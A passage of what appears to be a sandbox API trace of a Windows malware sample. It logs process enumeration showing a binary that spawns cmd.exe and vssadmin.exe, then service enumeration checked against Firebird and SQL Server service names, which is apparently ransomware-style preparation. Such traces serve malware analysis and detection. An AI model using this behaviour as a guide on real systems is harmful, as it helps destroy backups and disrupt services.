dwFlags=0x0, szExeFile="System")) returned 1 [0176.322] lstrlenW (lpString="System") returned 6 [0176.322] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x140, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0176.323] lstrlenW (lpString="smss.exe") returned 8 [0176.323] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.324] lstrlenW (lpString="csrss.exe") returned 9 [0176.324] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x190, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0176.325] lstrlenW (lpString="wininit.exe") returned 11 [0176.325] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0176.325] lstrlenW (lpString="csrss.exe") returned 9 [0176.325] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1e0, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0176.326] lstrlenW (lpString="winlogon.exe") returned 12 [0176.326] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0176.327] lstrlenW (lpString="services.exe") returned 12 [0176.327] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1e8, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0176.328] lstrlenW (lpString="lsass.exe") returned 9 [0176.328] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x230, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.328] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0176.328] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1e8, pcPriClassBase=8, dwFlags=0x0, szExeFile="fontdrvhost.exe")) returned 1 [0176.329] lstrlenW (lpString="fontdrvhost.exe") returned 15 [0176.329] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.330] lstrlenW (lpString="svchost.exe") returned 11 [0176.330] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.331] lstrlenW (lpString="svchost.exe") returned 11 [0176.331] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x230, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0176.332] lstrlenW (lpString="dwm.exe") returned 7 [0176.332] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3e, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.333] lstrlenW (lpString="svchost.exe") returned 11 [0176.333] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.334] lstrlenW (lpString="svchost.exe") returned 11 [0176.334] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.335] lstrlenW (lpString="svchost.exe") returned 11 [0176.335] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.336] lstrlenW (lpString="svchost.exe") returned 11 [0176.336] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x23, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.337] lstrlenW (lpString="svchost.exe") returned 11 [0176.337] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.337] lstrlenW (lpString="svchost.exe") returned 11 [0176.338] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.338] lstrlenW (lpString="svchost.exe") returned 11 [0176.338] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x544, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.339] lstrlenW (lpString="svchost.exe") returned 11 [0176.339] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.340] lstrlenW (lpString="svchost.exe") returned 11 [0176.340] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x57c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.341] lstrlenW (lpString="svchost.exe") returned 11 [0176.341] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0176.342] lstrlenW (lpString="spoolsv.exe") returned 11 [0176.342] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x680, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.343] lstrlenW (lpString="svchost.exe") returned 11 [0176.343] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x4b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0176.344] lstrlenW (lpString="audiodg.exe") returned 11 [0176.344] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x714, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0176.344] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0176.345] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x754, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0176.345] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0176.345] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0176.347] lstrlenW (lpString="Memory Compression") returned 18 [0176.347] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x854, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0176.347] lstrlenW (lpString="sihost.exe") returned 10 [0176.348] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x24c, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0176.348] lstrlenW (lpString="svchost.exe") returned 11 [0176.348] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3bc, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0176.349] lstrlenW (lpString="msoia.exe") returned 9 [0176.349] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3bc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0176.350] lstrlenW (lpString="taskhostw.exe") returned 13 [0176.350] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3f, th32ParentProcessID=0x9c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.351] lstrlenW (lpString="explorer.exe") returned 12 [0176.351] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0176.352] lstrlenW (lpString="SearchUI.exe") returned 12 [0176.352] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0176.353] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0176.353] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbcc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0176.354] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0176.354] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xca0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0176.355] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0176.355] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x9d4, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0176.356] lstrlenW (lpString="hgaibc.exe") returned 10 [0176.356] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xe24, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0176.356] lstrlenW (lpString="cmd.exe") returned 7 [0176.356] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0176.357] lstrlenW (lpString="conhost.exe") returned 11 [0176.358] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf90, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0176.358] lstrlenW (lpString="dllhost.exe") returned 11 [0176.359] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1 [0176.359] lstrlenW (lpString="vssadmin.exe") returned 12 [0176.359] Process32NextW (in: hSnapshot=0x530, lppe=0x252fd2c | out: lppe=0x252fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf98, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0xe40, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0 [0176.360] CloseHandle (hObject=0x530) returned 1 [0176.360] Sleep (dwMilliseconds=0x1f4) [0176.966] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x458c498 [0176.967] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 0 [0176.967] GetLastError () returned 0xea [0176.967] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1c30) returned 0x4601700 [0176.968] EnumServicesStatusExW (in: hSCManager=0x458c498, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x4601700, cbBufSize=0x1c30, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x4601700, pcbBytesNeeded=0x252ff3c, lpServicesReturned=0x252ff54, lpResumeHandle=0x0) returned 1 [0176.968] CloseServiceHandle (hSCObject=0x458c498) returned 1 [0176.969] lstrlenW (lpString="Appinfo") returned 7 [0176.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0176.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0176.969] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0176.969] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0176.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0176.969] lstrlenW (lpString="AppXSvc") returned 7 [0176.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0176.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0176.969] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0176.969] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0176.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0176.969] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0176.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0176.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0176.969] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0176.969] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0176.969] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0176.969] lstrlenW (lpString="Audiosrv") returned 8 [0176.969] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0176.969] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0176.969] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0176.969] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0176.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0176.970] lstrlenW (lpString="BFE") returned 3 [0176.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0176.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0176.970] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0176.970] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0176.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0176.970] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0176.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0176.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0176.970] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0176.970] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0176.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0176.970] lstrlenW (lpString="CDPSvc") returned 6 [0176.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0176.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0176.970] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0176.970] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0176.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0176.970] lstrlenW (lpString="ClickToRunSvc") returned 13 [0176.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0176.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0176.970] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0176.970] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0176.970] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0176.970] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0176.970] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0176.970] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0176.971] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0176.971] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0176.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0176.971] lstrlenW (lpString="CryptSvc") returned 8 [0176.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0176.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0176.971] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0176.971] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0176.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0176.971] lstrlenW (lpString="DcomLaunch") returned 10 [0176.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0176.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0176.971] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0176.971] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0176.971] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0176.971] lstrlenW (lpString="DeviceAssociationService") returned 24 [0176.971] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0176.971] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DeviceAssociationService") returned 1 [0176.971] lstrcmpiW (lpString1="sqlwriter", lpString2="DeviceAssociationService") returned 1 [0176.972] lstrcmpiW (lpString1="mssqlserver", lpString2="DeviceAssociationService") returned 1 [0176.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DeviceAssociationService") returned 1 [0176.972] lstrlenW (lpString="Dhcp") returned 4 [0176.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0176.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0176.972] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0176.972] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0176.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0176.972] lstrlenW (lpString="Dnscache") returned 8 [0176.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0176.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0176.972] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0176.972] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0176.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0176.972] lstrlenW (lpString="DPS") returned 3 [0176.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0176.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0176.972] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0176.972] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0176.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0176.972] lstrlenW (lpString="DusmSvc") returned 7 [0176.972] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DusmSvc") returned 1 [0176.972] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DusmSvc") returned 1 [0176.972] lstrcmpiW (lpString1="sqlwriter", lpString2="DusmSvc") returned 1 [0176.972] lstrcmpiW (lpString1="mssqlserver", lpString2="DusmSvc") returned 1 [0176.972] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DusmSvc") returned 1 [0176.972] lstrlenW (lpString="EventLog") returned 8 [0176.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventLog") returned 1 [0176.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventLog") returned 1 [0176.973] lstrcmpiW (lpString1="sqlwriter", lpString2="EventLog") returned 1 [0176.973] lstrcmpiW (lpString1="mssqlserver", lpString2="EventLog") returned 1 [0176.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventLog") returned 1 [0176.973] lstrlenW (lpString="EventSystem") returned 11 [0176.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0176.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0176.973] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0176.973] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0176.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0176.973] lstrlenW (lpString="FontCache") returned 9 [0176.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="FontCache") returned -1 [0176.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="FontCache") returned -1 [0176.973] lstrcmpiW (lpString1="sqlwriter", lpString2="FontCache") returned 1 [0176.973] lstrcmpiW (lpString1="mssqlserver", lpString2="FontCache") returned 1 [0176.973] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="FontCache") returned 1 [0176.973] lstrlenW (lpString="gpsvc") returned 5 [0176.973] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0176.973] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0176.973] lstrcmpiW 